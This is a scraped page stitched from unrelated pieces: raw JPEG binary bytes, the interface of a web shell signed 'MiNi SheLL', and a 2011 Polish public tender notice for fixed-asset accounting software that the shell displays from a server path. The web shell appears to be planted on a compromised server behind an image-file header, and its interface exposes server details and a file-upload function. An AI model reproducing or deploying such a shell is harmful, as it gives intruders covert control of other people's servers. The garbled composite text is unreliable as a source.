JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110105/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110105/5545-N-2011.html

<p class="kh_header"><b>Łódź: ZAKUP PROGRAMU KOMPUTEROWEGO DO OBSŁUGI ŚRODKÓW TRWAŁYCH</b><br>
<b>Numer ogłoszenia: 5545 - 2011; data zamieszczenia: 05.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Łódzka Spółka Infrastrukturalna Sp. z o.o. , ul. Piotrkowska 190, 90-368 Łódź, woj. łódzkie, tel. 042 6649100, faks 042 6649102.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lsi.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZAKUP PROGRAMU KOMPUTEROWEGO DO OBSŁUGI ŚRODKÓW TRWAŁYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Program ewidencji środków trwałych i wyposażenia tj.


1.	Dostawa oprogramowania o funkcjonalności:
a.	Ewidencja 
i.	Środków trwałych (ŚT)
ii.	Wartości Niematerialnych i Prawnych (WNiP)
iii.	Wyposażenia
iv.	Możliwość prowadzenia każdej ewidencji z osobna
v.	Możliwość podziału ŚT oraz WNiP na dowolną ilość ksiąg inwentarzowych
vi.	Możliwość podziału ŚT oraz WNiP na dowolną ilość grup i podgrup
b.	Szacowana wielkość bazy danych 100 000 środków trwałych
c.	Funkcjonalność
i.	Pełna integracja pomiędzy różnymi obszarami funkcjonalności systemu bez konieczności importu/exportu lub synchronizacji danych
ii.	Zarządzanie uprawnieniami operatorów
iii.	Eksport danych z systemu do MS Office Excel oraz Open Office Calc
iv.	Import danych z MS Office Excel oraz Open Office Calc do systemu
v.	Zestaw gotowych analiz prezentujących w formie tabelarycznej i graficznej informacje gromadzone w systemie
vi.	Możliwość samodzielnego przygotowywania raportów i analiz
vii.	Mechanizm pozwalający na zapisywanie wydruków w formacie pdf z możliwością automatycznego załączania do wiadomości e-mail
viii.	Pełna obsługa urzędowej Klasyfikacji Środków Trwałych
ix.	Wprowadzanie wielu parametrów opisowych środka trwałego (długość, przekrój, materiał, itp.)
x.	Dokonywanie odpisów amortyzacyjnych rożnymi metodami z zastosowaniem różnych stawek (bilansowa, podatkowa) zgodnie z obowiązującymi przepisami
xi.	Likwidacje częściowe i całkowite
xii.	Zmiany wartości z uwagi na modernizacje, doksięgowania z zachowaniem widoczności zmian
xiii.	Zachowanie historycznych danych (zmiana nazwy środka, miejsca użytkowania itp.)
xiv.	Tworzenie dokumentów związanych z ewidencja środków trwałych (przychód, zmiana, likwidacja, itp.)
xv.	 Odrębne tabele odpisów amortyzacyjnych i umorzeń
xvi.	Dwutorowość amortyzacji, czyli osobne określenie na potrzeby amortyzacji bilansowej i podatkowej takich zmiennych jak Stawka amortyzacji, Podstawa amortyzacji, Współczynnik korekty amortyzacji, Metoda amortyzacji, Miesiąc rozpoczęcia amortyzacji
xvii.	Obsługa metod amortyzacji takich jak: jednorazowa, liniowa, degresywna, przyspieszona
xviii.	Generowanie raportów po dowolnych parametrach środków trwałych na dowolny dzień
xix.	Generowania zestawień stanów i obrotów (zakup przyjecie likwidacja, modernizacja) na dowolny dzień dla wybranych grup
xx.	Predefiniowanie nazw ulic, materiałów i wszystkich typów wyliczeniowych
xxi.	Umożliwienie oznakowania środków dla celów podatkowych w podziale na gminy
xxii.	Przygotowanie zestawień pod deklaracje podatkową źródła finansowania
xxiii.	Obliczanie podatku od nieruchomości. Oznakowanie ST , które podlegają pod podatek od nieruchomości 
xxiv.	Możliwość wprowadzenia podstawy, gdzie podatek obliczany jest od wartości 
xxv.	Możliwość wprowadzenia podstawy,  gdzie podatek obliczany jest od powierzchni ( możliwość wprowadzenia tej powierzchni )
xxvi.	Możliwość wpisania stawek podatku od nieruchomości zależnie od gminy, gdzie podatek jest odprowadzany
xxvii.	Naliczanie i drukowanie deklaracji  podatku od nieruchomości z podziałem na gminy, gdzie podatek jest odprowadzany 
xxviii.	Schematy księgowe - automatyczna dekretacja wprowadzonych dokumentów
xxix.	Tworzenie Planu inwentaryzacji na dany rok ( dla wszystkich obszarów :  podatkowy, bilansowy )
xxx.	Możliwość bezpośredniego przejścia z karty danego środka trwałego infrastruktury wodno-kanalizacyjnej do Systemu Informacji Geograficznej (GIS) prowadzonego przez Zakład Wodociągów i Kanalizacji, do którego Zamawiający ma dostęp poprzez przeglądarkę www i automatyczne wyświetlenie informacji dotyczących tego środka zawartych w GIS
d.	Inwentaryzacja
i.	Tworzenie dokumentów zestawienia ( kartoteki środków trwałych, Wartości niematerialnych i prawnych, wyposażenia )  do spisu z natury zawierające wszystkie niezbędne dane
ii.	Tworzenie arkuszy spisowych 
iii.	Rozliczanie inwentaryzacji - porównanie uzupełnionych arkuszy z kartoteką , tworzenie dokumentów inwentaryzacyjnych - niedobory i nadwyżki
iv.	Możliwość oznakowania które środki trwałe, Wartości niematerialne i prawne, wyposażenie były inwentaryzowane.
v.	Tworzenie raportów zinwentaryzowanych i niezinwentaryzowanych środków trwałych, Wartości niematerialnych i prawnych, wyposażenia
2.	Instalacja i konfiguracja aplikacji na środowisku produkcyjnym
3.	Ilość stanowisk min. 5
4.	Wykonanie migracji danych przechowywanych przez zamawiającego w aktualnej bazie danych (Symfonia Forte, Symfonia Premium, Excel)
5.	Wykorzystanie posiadanego przez zamawiającego sprzętu oraz oprogramowania MS SQL Server Standard
6.	Wykonawca przeprowadzi szkolenia użytkowników i administratorów systemu w liczbie min. 6 osób , w ramach wdrożenia w wymiarze 5 godzin w siedzibie zamawiającego
7.	Wykonawca zapewni pomoc techniczną przy obsłudze programu dotyczącą administracji, świadczoną telefonicznie lub e-mailem, a w razie konieczności w siedzibie zamawiającego przez okres 12 miesięcy od dnia podpisania przez Strony bez uwag protokołu odbioru.
8.	Wykonawca udzieli 12 miesięcznej gwarancji na poprawne działanie programu. Gwarancja będzie liczona od podpisania przez Strony bez uwag protokołu odbioru. 
9.	Wszelkie ujawnione w okresie gwarancji wady zostaną usunięte w terminie 3 dni roboczych od dnia zgłoszenia wady przez Zamawiającego (e-mail lub faks). W przypadku nieusunięcia przez wykonawcę wad w/w terminie Zamawiający zleci usunięcie wad innemu podmiotowi a wykonawcę obciąży kosztami usunięcia wady. 
W ramach gwarancji wykonawca udostępni bezpłatnie zamawiającemu wszelkie aktualizacje (podnoszące wersję lub usuwające nieprawidłowości tzw. łatki) oprogramowania w okresie 12 miesięcy od dnia podpisania przez Strony bez uwag protokołu odbioru. 
10.	Podstawą do podpisania przez Zamawiającego protokołu odbioru sporządzonego przez wykonawcę będzie dostarczenia oraz wdrożenie systemu na środowisku produkcyjnym zamawiającego (wdrożenie obejmuje migrację danych z systemów o których mowa w punkcie 4.)
11.	Wykonawca przekaże Zamawiającemu dostęp administracyjny do ustawień programu
12.	Zamawiający zastrzega sobie prawo do przeprowadzenia testów sprawdzających poprawność funkcjonowania oferowanego oprogramowania w zakresie zgodności z Opisem Przedmiotu Zamówienia punktem 1, na zasadzie spełnia - nie spełnia. Niespełnienie przez oferowane oprogramowania przynajmniej jednego z wymogów Zamawiającego skutkować będzie odrzuceniem oferty.
O terminie i miejscu przeprowadzenia testów Wykonawca zostanie poinformowany odrębnym pismem. Wykonawca, którego oprogramowanie będzie testowane, bezpłatnie dostarczy i skonfiguruje na sprzęcie Zamawiającego oferowane oprogramowanie oraz zaprezentuje spełnianie wymogów Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość  udzielenia zamówienia uzupełniającego w wysokości do 50% wartości zamówienia podstawowego i polegających na powtórzeniu czynności tego samego rodzaju zamówień zgodnie z art. 67 ust. 1 pkt. 6 PZP i jest zgodne z przedmiotem zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 48.44.30.00-5, 72.26.30.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełnienia tego warunku dokonana będzie na podstawie złożonego przez Wykonawcę oświadczenia  o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy PZP - sporządzone na podstawie wzoru stanowiącego załącznik nr 2 do SIWZ;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełnienia tego warunku dokonana będzie na podstawie złożonego przez Wykonawcę oświadczenia  o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy PZP - sporządzone na podstawie wzoru stanowiącego załącznik nr 2 do SIWZ;
Wykonawca może polegać na  wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia - sporządzone na podstawie wzoru stanowiącego załącznik nr 5 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełnienia tego warunku dokonana będzie na podstawie złożonego przez Wykonawcę oświadczenia  o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy PZP - sporządzone na podstawie wzoru stanowiącego załącznik nr 2 do SIWZ;
Wykonawca może polegać na  potencjale technicznym innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia - sporządzone na podstawie wzoru stanowiącego załącznik nr 5 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełnienia tego warunku dokonana będzie na podstawie złożonego przez Wykonawcę oświadczenia  o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy PZP - sporządzone na podstawie wzoru stanowiącego załącznik nr 2 do SIWZ;
Wykonawca może polegać na osobach zdolnych do wykonania zamówienia  innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia - sporządzone na podstawie wzoru stanowiącego załącznik nr 5 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełnienia tego warunku dokonana będzie na podstawie złożonego przez Wykonawcę oświadczenia  o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy PZP - sporządzone na podstawie wzoru stanowiącego załącznik nr 2 do SIWZ;
Wykonawca może polegać na  zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia - sporządzone na podstawie wzoru stanowiącego załącznik nr 5 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>3.	Inne dokumenty wymagane przez Zamawiającego jakie mogą złożyć Wykonawcy :
1)	aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli wykonawca posiada taki wpis;
2)	NIP;
3)	REGON.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający  przewiduje możliwość dokonania  zmiany postanowień zawartej umowy 
w stosunku do  treści oferty w następujących przypadkach:
1) przedłużenia terminu realizacji zamówienia jeżeli zaistnieje potrzeba jego przedłużenia  z przyczyn niezależnych od Wykonawcy albo od Zamawiającego.
2)przedłużenia terminu realizacji zamówienia jeżeli zaistnieje potrzeba jego przedłużenia  z przyczyn zależnych od Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lsi.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Łódzka Spółka Infrastrukturalna Sp. z o.o. 90 - 368 Łódź ul. Piotrkowska 190, sekretariat I piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.01.2011 godzina 10:00, miejsce: Łódzka Spółka Infrastrukturalna Sp. z o.o. 90 - 368 Łódź ul. Piotrkowska 190, sekretariat I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com